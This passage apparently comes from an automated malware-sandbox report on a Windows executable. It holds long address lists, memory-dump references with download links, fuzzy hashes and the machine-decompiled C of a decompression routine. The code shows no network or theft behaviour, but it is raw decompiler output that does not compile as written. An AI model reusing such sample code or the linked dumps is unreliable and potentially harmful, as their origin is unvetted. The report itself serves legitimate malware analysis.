                                                                                                                    0x004062d2
                                                                                                                    0x004062d5
                                                                                                                    0x004062d8
                                                                                                                    0x004062f4
                                                                                                                    0x004062f7
                                                                                                                    0x004062fa
                                                                                                                    0x004062fd
                                                                                                                    0x00406304
                                                                                                                    0x00406308
                                                                                                                    0x0040630a
                                                                                                                    0x0040630e
                                                                                                                    0x004062da
                                                                                                                    0x004062da
                                                                                                                    0x004062de
                                                                                                                    0x004062e6
                                                                                                                    0x004062eb
                                                                                                                    0x004062ed
                                                                                                                    0x004062ef
                                                                                                                    0x004062ef
                                                                                                                    0x00406311
                                                                                                                    0x00406318
                                                                                                                    0x0040631b
                                                                                                                    0x00000000
                                                                                                                    0x00406321
                                                                                                                    0x00000000
                                                                                                                    0x00406321
                                                                                                                    0x00000000
                                                                                                                    0x00406326
                                                                                                                    0x00406326
                                                                                                                    0x0040632a
                                                                                                                    0x004069ea
                                                                                                                    0x00000000
                                                                                                                    0x004069ea
                                                                                                                    0x00406330
                                                                                                                    0x00406333
                                                                                                                    0x00406336
                                                                                                                    0x0040633a
                                                                                                                    0x0040633d
                                                                                                                    0x00406343
                                                                                                                    0x00406345
                                                                                                                    0x00406345
                                                                                                                    0x00406345
                                                                                                                    0x00406348
                                                                                                                    0x0040634b
                                                                                                                    0x0040634b
                                                                                                                    0x0040634b
                                                                                                                    0x00406351
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406353
                                                                                                                    0x00406356
                                                                                                                    0x00406359
                                                                                                                    0x0040635c
                                                                                                                    0x0040635f
                                                                                                                    0x00406362
                                                                                                                    0x00406365
                                                                                                                    0x00406368
                                                                                                                    0x0040636b
                                                                                                                    0x0040636e
                                                                                                                    0x00406371
                                                                                                                    0x00406389
                                                                                                                    0x0040638c
                                                                                                                    0x0040638f
                                                                                                                    0x00406392
                                                                                                                    0x00406392
                                                                                                                    0x00406395
                                                                                                                    0x00406399
                                                                                                                    0x0040639b
                                                                                                                    0x00406373
                                                                                                                    0x00406373
                                                                                                                    0x0040637b
                                                                                                                    0x00406380
                                                                                                                    0x00406382
                                                                                                                    0x00406384
                                                                                                                    0x00406384
                                                                                                                    0x0040639e
                                                                                                                    0x004063a5
                                                                                                                    0x004063a8
                                                                                                                    0x00000000
                                                                                                                    0x004063aa
                                                                                                                    0x00000000
                                                                                                                    0x004063aa
                                                                                                                    0x004063a8
                                                                                                                    0x004063af
                                                                                                                    0x004063af
                                                                                                                    0x004063af
                                                                                                                    0x004063af
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004063ea
                                                                                                                    0x004063ea
                                                                                                                    0x004063ee
                                                                                                                    0x004069f6
                                                                                                                    0x00000000
                                                                                                                    0x004069f6
                                                                                                                    0x004063f4
                                                                                                                    0x004063f7
                                                                                                                    0x004063fa
                                                                                                                    0x004063fe
                                                                                                                    0x00406401
                                                                                                                    0x00406407
                                                                                                                    0x00406409
                                                                                                                    0x00406409
                                                                                                                    0x00406409
                                                                                                                    0x0040640c
                                                                                                                    0x0040640f
                                                                                                                    0x0040640f
                                                                                                                    0x00406415
                                                                                                                    0x004063b3
                                                                                                                    0x004063b3
                                                                                                                    0x004063b6
                                                                                                                    0x00000000
                                                                                                                    0x004063b6
                                                                                                                    0x00406417
                                                                                                                    0x00406417
                                                                                                                    0x0040641a
                                                                                                                    0x0040641d
                                                                                                                    0x00406420
                                                                                                                    0x00406423
                                                                                                                    0x00406426
                                                                                                                    0x00406429
                                                                                                                    0x0040642c
                                                                                                                    0x0040642f
                                                                                                                    0x00406432
                                                                                                                    0x00406435
                                                                                                                    0x0040644d
                                                                                                                    0x00406450
                                                                                                                    0x00406453
                                                                                                                    0x00406456
                                                                                                                    0x00406456
                                                                                                                    0x00406459
                                                                                                                    0x0040645d
                                                                                                                    0x0040645f
                                                                                                                    0x00406437
                                                                                                                    0x00406437
                                                                                                                    0x0040643f
                                                                                                                    0x00406444
                                                                                                                    0x00406446
                                                                                                                    0x00406448
                                                                                                                    0x00406448
                                                                                                                    0x00406462
                                                                                                                    0x00406469
                                                                                                                    0x0040646c
                                                                                                                    0x00000000
                                                                                                                    0x0040646e
                                                                                                                    0x00000000
                                                                                                                    0x0040646e
                                                                                                                    0x00000000
                                                                                                                    0x004066fb
                                                                                                                    0x004066fb
                                                                                                                    0x004066ff
                                                                                                                    0x00406a26
                                                                                                                    0x00000000
                                                                                                                    0x00406a26
                                                                                                                    0x00406705
                                                                                                                    0x00406708
                                                                                                                    0x0040670b
                                                                                                                    0x0040670f
                                                                                                                    0x00406712
                                                                                                                    0x00406718
                                                                                                                    0x0040671a
                                                                                                                    0x0040671a
                                                                                                                    0x0040671a
                                                                                                                    0x0040671d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004064cb
                                                                                                                    0x004064cb
                                                                                                                    0x004064ce
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x0040680a
                                                                                                                    0x0040680e
                                                                                                                    0x00406830
                                                                                                                    0x00406833
                                                                                                                    0x0040683d
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00406810
                                                                                                                    0x00406813
                                                                                                                    0x00406817
                                                                                                                    0x0040681a
                                                                                                                    0x0040681a
                                                                                                                    0x0040681d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004068c7
                                                                                                                    0x004068cb
                                                                                                                    0x004068e9
                                                                                                                    0x004068e9
                                                                                                                    0x004068e9
                                                                                                                    0x004068f0
                                                                                                                    0x004068f7
                                                                                                                    0x004068fe
                                                                                                                    0x004068fe
                                                                                                                    0x00000000
                                                                                                                    0x004068fe
                                                                                                                    0x004068cd
                                                                                                                    0x004068d0
                                                                                                                    0x004068d3
                                                                                                                    0x004068d6
                                                                                                                    0x004068dd
                                                                                                                    0x00406821
                                                                                                                    0x00406821
                                                                                                                    0x00406824
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004069b8
                                                                                                                    0x004069bb
                                                                                                                    0x004068bc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004065f2
                                                                                                                    0x004065f4
                                                                                                                    0x004065fb
                                                                                                                    0x004065fc
                                                                                                                    0x004065fe
                                                                                                                    0x00406601
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406609
                                                                                                                    0x0040660c
                                                                                                                    0x0040660f
                                                                                                                    0x00406611
                                                                                                                    0x00406613
                                                                                                                    0x00406613
                                                                                                                    0x00406614
                                                                                                                    0x00406617
                                                                                                                    0x0040661e
                                                                                                                    0x00406621
                                                                                                                    0x0040662f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406905
                                                                                                                    0x00406905
                                                                                                                    0x00406908
                                                                                                                    0x0040690f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406914
                                                                                                                    0x00406914
                                                                                                                    0x00406918
                                                                                                                    0x00406a50
                                                                                                                    0x00000000
                                                                                                                    0x00406a50
                                                                                                                    0x0040691e
                                                                                                                    0x00406921
                                                                                                                    0x00406924
                                                                                                                    0x00406928
                                                                                                                    0x0040692b
                                                                                                                    0x00406931
                                                                                                                    0x00406933
                                                                                                                    0x00406933
                                                                                                                    0x00406933
                                                                                                                    0x00406936
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x0040693c
                                                                                                                    0x0040693c
                                                                                                                    0x00406940
                                                                                                                    0x004069a0
                                                                                                                    0x004069a3
                                                                                                                    0x004069a8
                                                                                                                    0x004069a9
                                                                                                                    0x004069ab
                                                                                                                    0x004069ad
                                                                                                                    0x004069b0
                                                                                                                    0x004068bc
                                                                                                                    0x004068bc
                                                                                                                    0x00000000
                                                                                                                    0x004068c2
                                                                                                                    0x004068bc
                                                                                                                    0x00406942
                                                                                                                    0x00406948
                                                                                                                    0x0040694b
                                                                                                                    0x0040694e
                                                                                                                    0x00406951
                                                                                                                    0x00406954
                                                                                                                    0x00406957
                                                                                                                    0x0040695a
                                                                                                                    0x0040695d
                                                                                                                    0x00406960
                                                                                                                    0x00406963
                                                                                                                    0x0040697c
                                                                                                                    0x0040697f
                                                                                                                    0x00406982
                                                                                                                    0x00406985
                                                                                                                    0x00406989
                                                                                                                    0x0040698b
                                                                                                                    0x0040698b
                                                                                                                    0x0040698c
                                                                                                                    0x0040698f
                                                                                                                    0x00406965
                                                                                                                    0x00406965
                                                                                                                    0x0040696d
                                                                                                                    0x00406972
                                                                                                                    0x00406974
                                                                                                                    0x00406977
                                                                                                                    0x00406977
                                                                                                                    0x00406992
                                                                                                                    0x00406999
                                                                                                                    0x00000000
                                                                                                                    0x0040699b
                                                                                                                    0x00000000
                                                                                                                    0x0040699b
                                                                                                                    0x00000000
                                                                                                                    0x00406637
                                                                                                                    0x0040663a
                                                                                                                    0x00406670
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a3
                                                                                                                    0x004067a3
                                                                                                                    0x004067a6
                                                                                                                    0x004067a8
                                                                                                                    0x00406a32
                                                                                                                    0x00000000
                                                                                                                    0x00406a32
                                                                                                                    0x004067ae
                                                                                                                    0x004067b1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067b7
                                                                                                                    0x004067bb
                                                                                                                    0x004067be
                                                                                                                    0x004067be
                                                                                                                    0x004067be
                                                                                                                    0x00000000
                                                                                                                    0x004067be
                                                                                                                    0x0040663c
                                                                                                                    0x0040663e
                                                                                                                    0x00406640
                                                                                                                    0x00406642
                                                                                                                    0x00406645
                                                                                                                    0x00406646
                                                                                                                    0x00406648
                                                                                                                    0x0040664a
                                                                                                                    0x0040664d
                                                                                                                    0x00406650
                                                                                                                    0x00406666
                                                                                                                    0x0040666b
                                                                                                                    0x004066a3
                                                                                                                    0x004066a3
                                                                                                                    0x004066a7
                                                                                                                    0x004066d3
                                                                                                                    0x004066d5
                                                                                                                    0x004066dc
                                                                                                                    0x004066df
                                                                                                                    0x004066e2
                                                                                                                    0x004066e2
                                                                                                                    0x004066e7
                                                                                                                    0x004066e7
                                                                                                                    0x004066e9
                                                                                                                    0x004066ec
                                                                                                                    0x004066f3
                                                                                                                    0x004066f6
                                                                                                                    0x00406723
                                                                                                                    0x00406723
                                                                                                                    0x00406726
                                                                                                                    0x00406729
                                                                                                                    0x0040679d
                                                                                                                    0x0040679d
                                                                                                                    0x0040679d
                                                                                                                    0x00000000
                                                                                                                    0x0040679d
                                                                                                                    0x0040672b
                                                                                                                    0x00406731
                                                                                                                    0x00406734
                                                                                                                    0x00406737
                                                                                                                    0x0040673a
                                                                                                                    0x0040673d
                                                                                                                    0x00406740
                                                                                                                    0x00406743
                                                                                                                    0x00406746
                                                                                                                    0x00406749
                                                                                                                    0x0040674c
                                                                                                                    0x00406765
                                                                                                                    0x00406767
                                                                                                                    0x0040676a
                                                                                                                    0x0040676b
                                                                                                                    0x0040676e
                                                                                                                    0x00406770
                                                                                                                    0x00406773
                                                                                                                    0x00406775
                                                                                                                    0x00406777
                                                                                                                    0x0040677a
                                                                                                                    0x0040677c
                                                                                                                    0x0040677f
                                                                                                                    0x00406783
                                                                                                                    0x00406785
                                                                                                                    0x00406785
                                                                                                                    0x00406786
                                                                                                                    0x00406789
                                                                                                                    0x0040678c
                                                                                                                    0x0040674e
                                                                                                                    0x0040674e
                                                                                                                    0x00406756
                                                                                                                    0x0040675b
                                                                                                                    0x0040675d
                                                                                                                    0x00406760
                                                                                                                    0x00406760
                                                                                                                    0x0040678f
                                                                                                                    0x00406796
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00000000
                                                                                                                    0x00406798
                                                                                                                    0x00000000
                                                                                                                    0x00406798
                                                                                                                    0x00406796
                                                                                                                    0x004066a9
                                                                                                                    0x004066ac
                                                                                                                    0x004066ae
                                                                                                                    0x004066b1
                                                                                                                    0x004066b4
                                                                                                                    0x004066b7
                                                                                                                    0x004066b9
                                                                                                                    0x004066bc
                                                                                                                    0x004066bf
                                                                                                                    0x004066bf
                                                                                                                    0x004066c2
                                                                                                                    0x004066c2
                                                                                                                    0x004066c5
                                                                                                                    0x004066cc
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x00000000
                                                                                                                    0x004066ce
                                                                                                                    0x00000000
                                                                                                                    0x004066ce
                                                                                                                    0x004066cc
                                                                                                                    0x00406652
                                                                                                                    0x00406655
                                                                                                                    0x00406657
                                                                                                                    0x0040665a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004063b9
                                                                                                                    0x004063b9
                                                                                                                    0x004063bd
                                                                                                                    0x00406a02
                                                                                                                    0x00000000
                                                                                                                    0x00406a02
                                                                                                                    0x004063c3
                                                                                                                    0x004063c6
                                                                                                                    0x004063c9
                                                                                                                    0x004063cc
                                                                                                                    0x004063cf
                                                                                                                    0x004063d2
                                                                                                                    0x004063d5
                                                                                                                    0x004063d7
                                                                                                                    0x004063da
                                                                                                                    0x004063dd
                                                                                                                    0x004063e0
                                                                                                                    0x004063e2
                                                                                                                    0x004063e2
                                                                                                                    0x004063e2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406544
                                                                                                                    0x00406544
                                                                                                                    0x00406548
                                                                                                                    0x00406a0e
                                                                                                                    0x00000000
                                                                                                                    0x00406a0e
                                                                                                                    0x0040654e
                                                                                                                    0x00406551
                                                                                                                    0x00406554
                                                                                                                    0x00406557
                                                                                                                    0x00406559
                                                                                                                    0x00406559
                                                                                                                    0x00406559
                                                                                                                    0x0040655c
                                                                                                                    0x0040655f
                                                                                                                    0x00406562
                                                                                                                    0x00406565
                                                                                                                    0x00406568
                                                                                                                    0x0040656b
                                                                                                                    0x0040656c
                                                                                                                    0x0040656e
                                                                                                                    0x0040656e
                                                                                                                    0x0040656e
                                                                                                                    0x00406571
                                                                                                                    0x00406574
                                                                                                                    0x00406577
                                                                                                                    0x0040657a
                                                                                                                    0x0040657a
                                                                                                                    0x0040657a
                                                                                                                    0x0040657d
                                                                                                                    0x0040657f
                                                                                                                    0x0040657f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067c1
                                                                                                                    0x004067c1
                                                                                                                    0x004067c1
                                                                                                                    0x004067c5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067cb
                                                                                                                    0x004067ce
                                                                                                                    0x004067d1
                                                                                                                    0x004067d4
                                                                                                                    0x004067d6
                                                                                                                    0x004067d6
                                                                                                                    0x004067d6
                                                                                                                    0x004067d9
                                                                                                                    0x004067dc
                                                                                                                    0x004067df
                                                                                                                    0x004067e2
                                                                                                                    0x004067e5
                                                                                                                    0x004067e8
                                                                                                                    0x004067e9
                                                                                                                    0x004067eb
                                                                                                                    0x004067eb
                                                                                                                    0x004067eb
                                                                                                                    0x004067ee
                                                                                                                    0x004067f1
                                                                                                                    0x004067f4
                                                                                                                    0x004067f7
                                                                                                                    0x004067fa
                                                                                                                    0x004067fe
                                                                                                                    0x00406800
                                                                                                                    0x00406803
                                                                                                                    0x00000000
                                                                                                                    0x00406805
                                                                                                                    0x00406582
                                                                                                                    0x00406582
                                                                                                                    0x00000000
                                                                                                                    0x00406582
                                                                                                                    0x00406803
                                                                                                                    0x00406a38
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406067
                                                                                                                    0x00406a6f
                                                                                                                    0x00406a6f
                                                                                                                    0x00000000
                                                                                                                    0x00406a6f
                                                                                                                    0x004068bc
                                                                                                                    0x00406843
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00406477

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                                                                                                    • Instruction ID: ed496f49c15cb1a0cee1f91230a4d4bd76d3fd25087baa69d2252d5f7e71f344
                                                                                                                    • Opcode Fuzzy Hash: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                                                                                                    • Instruction Fuzzy Hash: 30713271E00228CFDF28DFA8C8547ADBBB1FB44305F15806AD906BB281D7785A96DF44
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00406591, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 98%
                                                                                                                    			E00406591() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
